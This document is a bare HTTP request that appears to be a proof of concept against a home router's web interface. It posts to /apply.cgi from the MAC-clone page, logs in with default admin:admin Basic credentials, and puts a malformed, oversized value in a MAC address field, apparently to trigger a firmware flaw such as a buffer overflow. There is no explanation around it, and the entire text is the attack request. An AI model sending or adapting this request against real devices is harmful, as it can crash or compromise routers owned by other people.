POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 201
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/WanMAC.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

submit_button=WanMAC&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=1&def_hwaddr=6&def_hwaddr_0=01&def_hwaddr_1=23M3333333330&def_hwaddr_2=45&def_hwaddr_3=67&def_hwaddr_4=89&def_hwaddr_5=AC